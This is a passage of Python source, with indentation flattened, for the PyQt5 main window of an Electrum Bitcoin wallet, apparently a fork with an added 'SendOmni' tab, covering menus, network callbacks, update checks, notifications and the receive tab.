from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum
from electrum import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS, TYPE_SCRIPT
from electrum.plugin import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds, PrintError,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter)
from electrum.transaction import Transaction, TxOutput
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electrum.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.send_omni_tab = self.create_send_omni_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
tabs.addTab(self.send_omni_tab, read_QIcon("tab_send.png"), _('SendOmni'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = QMessageBox.question(self,
"Electrum - " + _("Enable update check"),
_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"),
QMessageBox.Yes,
QMessageBox.No)
config.set_key('check_updates', choice == QMessageBox.Yes, save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def on_history(self, b):
self.wallet.clear_coin_price_cache()
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
traceback.print_exception(*exc_info)
except OSError:
pass # see #4418
self.show_error(str(e))
def on_network(self, event, *args):
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
self.history_model.on_fee_histogram()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
self.need_update.set()
# Once the GUI has been initialized, check whether anything needs to be announced, since the callback may already have fired before the GUI existed
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# "Settings" / "Preferences" are reserved menu names on macOS; use a different label there as a workaround
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/spesmilo/electrum/issues\">https://github.com/spesmilo/electrum/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
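# Drain the queue of incoming transactions at most once every 20 seconds; three or more pending transactions are collapsed into a single summary notification.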
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.print_error("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
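# Keep the BTC and fiat amount edits in sync; the 'follows' flag marks programmatic updates so the paired textChanged signal does not re-enter and loop forever.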
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
amount = edit.get_amount()
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin address where the payment should be received. Note that each payment request uses a different Bitcoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
        self.expires_label.setReadOnly(True)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
